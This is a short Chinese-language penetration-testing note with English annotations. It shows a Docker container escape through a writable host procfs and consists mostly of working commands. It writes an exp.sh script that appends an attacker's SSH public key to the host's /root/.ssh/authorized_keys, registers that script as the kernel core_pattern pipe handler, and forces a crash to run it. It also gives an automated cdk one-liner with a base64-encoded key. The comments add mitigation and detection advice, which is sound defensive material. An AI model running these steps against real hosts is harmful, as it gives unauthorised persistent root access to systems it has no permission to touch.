Docker逃逸

1. 挂载宿主机procfs逃逸

1.1. 手动

# Check whether a procfs is reachable from inside the container (original note:
# "check whether a procfs mount exists"). A core_pattern found under a path other
# than the container's own /proc (the later write targets /host/proc) indicates
# the host's procfs has been mounted into the container — that mount, especially
# read-write, is the misconfiguration this whole technique depends on and the
# thing to remove when hardening.
find / -name core_pattern 2>/dev/null

# Show the current core-dump handler (original note: "check whether core_pattern
# can be modified"). The value itself does not prove writability — the apport
# line shown as sample output is just Ubuntu's default handler. Whether a write
# succeeds depends on whether the procfs being read is the host's and is mounted
# read-write, which is the condition an audit should look for.
cat /proc/sys/kernel/core_pattern
>>>> /usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E  #回显这个就是可以修改

# Locate the container's overlay2 upperdir as seen from the host (original note:
# "find the upperdir location"). The core_pattern handler path is resolved on the
# host side (the later write uses the host path <upperdir>/exp.sh, not /exp.sh),
# which is why this mount line is needed.
# Style note: `cat … | grep` is a useless use of cat; `grep docker /proc/mounts`
# reads the same file. Left unchanged here.
cat /proc/mounts | grep docker

rw,relatime,lowerdir=/var/lib/docker/overlay2/l/6JC6FZQGYKHHL4O2O5VQZ2UEPE:/var/lib/docker/overlay2/l/ZNRTUHIEVJBUG4YHHAI2WF3CGQ:/var/lib/docker/overlay2/l/B7X5DEEX2MIUSMKAMKG66GHM6H:/var/lib/docker/overlay2/l/JZ26UVGDDLBIN2AV5AN2SMQ33Y:/var/lib/docker/overlay2/l/PXVXR6FJH7TBYMIBZZWZL7IYRG:/var/lib/docker/overlay2/l/5F2TSJQ5SBGSANBFCV5FWGDQYB:/var/lib/docker/overlay2/l/IQNAZRWMPNDLUYBKM7OUPGBZ4H:/var/lib/docker/overlay2/l/XJQQDLF67JL4LL4OIHGGMJMDOS,upperdir=/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/diff,workdir=/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/wor

在容器根目录新建一个 exp.sh（它在宿主机上对应 upperdir/diff 目录下的同名文件），把我们的公钥写入 authorized_keys

#!/bin/bash
# exp.sh — the program registered as the core_pattern pipe handler. It is
# started by the kernel when a process crashes (see the explanation below the
# commands), presumably with host root privileges, which is why appending to
# /root/.ssh/authorized_keys here affects the host rather than the container.
# The container sees this file as /exp.sh; the host reaches it via the overlay2
# upperdir path.
# Detection: file-integrity or audit rules on /proc/sys/kernel/core_pattern and
# on root's authorized_keys would surface both halves of this technique; many
# runtime-security tools also alert on core_pattern being modified from a
# container (confirm for your tooling).
mkdir /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDVF88ItYRG1UwzIeL6ljhkAUuopU08NiNfcJPj7SO+x6UQNH18co75aaPZ1XPVeMji9jF3sa1nCcc+Bn0ls64mnO4ogXIKSdhj42nxS1/OWaBeBny5tkjbkFsE9+0DoqmIYA3Fj5JhQsAcdEUKLA1Jo09CvKks8hJ5OwX24M+06w== root@kali.com" >> /root/.ssh/authorized_keys

然后

chmod +x exp.sh
# Register the script as a pipe handler: the leading '|' makes the kernel execute
# the path on a crash instead of writing the dump to it. The path is the
# host-side overlay2 upperdir path from the mount listing, not /exp.sh, because
# the handler is resolved outside the container. Note the target is /host/proc —
# the host procfs mounted into the container — whereas the earlier checks read
# the container's own /proc; a read-write host procfs at a path like this is the
# precondition, and removing that mount (or making it read-only) closes it.
echo '|/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/diff/exp.sh' > /host/proc/sys/kernel/core_pattern
# Trigger a crash: `&` backgrounds sleep (it is not a pipeline) and `$!` is the
# PID of that background job, which then receives SIGSEGV. The kernel responds
# by starting the handler with the crash data on its stdin, as explained below.
sleep 10 & kill -SIGSEGV $!

这里以 | 开头，内核会将该字符串后面的内容当作一个可执行程序或脚本。程序崩溃时，内核会启动该程序，并将崩溃堆栈信息通过标准输入（stdin）传给它。如果开头不加 |，那么内核会将崩溃信息写入这个文件，而不会当作脚本执行

1.2. 自动

# Automated variant using the third-party cdk tool's mount-procfs module. From
# the arguments it appears to take the host procfs mount point and a command to
# run, presumably automating the manual core_pattern steps above (not verifiable
# from this page). The base64 payload appears to decode to the same ssh-rsa key
# written by exp.sh. Defender takeaway: the precondition is unchanged — a
# writable host procfs inside the container — so the mitigation and the
# detection points (core_pattern writes, authorized_keys changes) are the same.
./cdk run mount-procfs /host/proc/ 'echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFBZ1FEVkY4OEl0WVJHMVV3ekllTDZsamhrQVV1b3BVMDhOaU5mY0pQajdTTyt4NlVRTkgxOGNvNzVhYVBaMVhQVmVNamk5akYzc2ExbkNjYytCbjBsczY0bW5PNG9nWElLU2RoajQybnhTMS9PV2FCZUJueTV0a2pia0ZzRTkrMERvcW1JWUEzRmo1SmhRc0FjZEVVS0xBMUpvMDlDdktrczhoSjVPd1gyNE0rMDZ3PT0gcm9vdEBrYWxpLmNvbQ== |base64 -d >> /root/.ssh/authorized_keys'